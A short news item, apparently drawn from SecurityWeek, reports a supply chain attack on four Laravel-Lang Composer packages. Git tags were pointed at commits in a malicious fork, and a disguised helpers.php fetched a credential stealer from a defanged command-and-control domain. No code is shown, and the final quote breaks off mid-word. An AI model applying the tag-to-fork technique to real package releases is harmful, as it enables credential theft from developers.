Hackers rewrote Git tags for four Laravel-Lang Composer packages: laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributes, and laravel-lang/actions. The supply chain attack began May 22 and involved a short window in which malicious version tags were published across multiple packages. By May 23, all four packages were poisoned. The tags were created to point to commits from a malicious fork rather than changes committed to the official repositories. The malicious tags affected hundreds of historical versions, potentially impacting fresh installs and update flows. The payload included a src/helpers.php file that fingerprints machines, contacts a command-and-control domain, and retrieves a PHP credential stealer. The malware targets cloud keys and tokens, container and orchestration configurations, Vault tokens, Helm settings, SSH private keys, developer credentials, authentication tokens, shell history, and credential storage data.
"The timing and pattern of the newly published tags point to a broader compromise of the Laravel Lang organization's release process, rather than a single malicious package version. According to the supply chain security firm, the malicious tags were published across over 700 historical versions of the four packages, potentially impacting all applications that fetched updates for them or installed them fresh."
"What makes this particularly sneaky is that the malicious code was never committed to the official repos at all. GitHub allows version tags to point to commits from a fork of the same repository. The attacker exploited this to create tags pointed to commits in a malicious fork they controlled."
"The malicious version tags contained a file named src/helpers.php, posing as a Laravel localization helper. The code fingerprints the machine, then connects to the command-and-control (C&C) domain flipboxstudio[.]info to fetch a PHP credential stealer and execute it in the background."
"The malware was designed to harvest cloud keys and tokens (including AWS, GCP, and Azure), Docker and Kubernetes configurations, HashiCorp Vault tokens, Helm repository configurations, SSH private keys, developer credentials, authentication tokens, shell history files, and credential-stor"
Read at SecurityWeek
Unable to calculate read time
Collection
[
|
...
]